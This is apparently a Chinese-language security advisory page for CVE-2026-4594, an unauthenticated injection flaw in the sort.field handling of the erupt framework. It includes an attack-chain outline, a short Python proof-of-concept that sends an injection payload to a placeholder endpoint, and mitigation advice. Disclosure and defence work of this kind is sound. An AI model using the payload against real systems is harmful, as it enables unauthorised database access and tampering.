CVE-2026-4594 CVSS 7.3 高危

CVE-2026-4594: erupt框架存在SQL注入漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4594

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

erupt

漏洞概述

erupts erupt框架版本1.13.3及之前存在高危SQL注入漏洞。该漏洞位于EruptJpaUtils.java的geneEruptHqlOrderBy函数中，因未正确处理sort.field参数，导致Hibernate层SQL注入。攻击者可无需认证远程发起攻击，利用此漏洞窃取数据或篡改信息。鉴于漏洞利用已公开且厂商未响应，需紧急关注。

技术细节

该漏洞发生在erupt框架的JPA数据访问层。具体位于`EruptJpaUtils.java`类的`geneEruptHqlOrderBy`方法中。该方法用于生成HQL（Hibernate Query Language）的排序语句。由于代码直接将用户可控的`sort.field`参数拼接到了HQL语句中，且未进行严格的黑名单或白名单校验，攻击者可以通过构造恶意的排序字段值来注入恶意的HQL片段。虽然Hibernate对原生SQL注入有一定防护，但在动态HQL拼接场景下，依然可以执行非法数据库操作。攻击者通过发送包含恶意Payload的HTTP请求，触发后端拼接执行HQL语句，从而可能导致数据库信息泄露、数据篡改甚至绕过认证等严重后果。由于无需用户交互且无需认证，该漏洞利用门槛极低。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标系统使用了erupts erupt框架，版本在1.13.3及以下。

STEP 2

2. 构造Payload

攻击者针对Hibernate HQL特性，构造包含恶意SQL片段的Payload，并将其赋值给sort.field参数。

STEP 3

3. 发送请求

攻击者向目标接口发送HTTP请求，将恶意Payload注入到请求参数中，无需经过任何认证。

STEP 4

4. 执行注入

后端EruptJpaUtils.java的geneEruptHqlOrderBy函数接收参数，将其直接拼接到HQL语句中并执行，导致注入生效。

STEP 5

5. 达成目的

攻击者利用注入漏洞获取敏感数据库信息（如用户密码）、篡改数据或进一步控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-4594: SQL Injection in erupt framework
# Targeting the 'sort.field' parameter in EruptJpaUtils.java

target_url = "http://vulnerable-target/api/erupt/data"

# Malicious payload intended for HQL injection in ORDER BY clause
# Adjust payload based on specific database syntax (H2, MySQL, etc.)
payload = "id,(select case when (1=1) then 1 else (select 1 from (select 1)x) end)"

params = {
    "sort[0].field": payload,
    "sort[0].order": "asc"
}

try:
    response = requests.get(target_url, params=params)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check for time delays or error messages indicating injection.")
        print(response.text[:200])
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

erupt <= 1.13.3

防御指南

临时缓解措施

由于厂商尚未回应，建议立即在应用网关层拦截请求参数中的特殊字符（如单引号、分号、括号等），特别是针对排序参数。同时，严格限制应用连接数据库的账户权限，禁止给予DROP、UPDATE等高危权限，以降低数据被篡改或删除的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4594
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4594
3 Details https://www.cvedetails.com/cve/CVE-2026-4594/
4 VulDB https://vuldb.com/cve/CVE-2026-4594
5 Link https://fx4tqqfvdw4.feishu.cn/docx/ETWUdbPk1oCC56xoEWHc3Q28nEc?from=from_copylink
6 Link https://vuldb.com/?ctiid.352431
7 Link https://vuldb.com/?id.352431
8 Link https://vuldb.com/?submit.775594

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表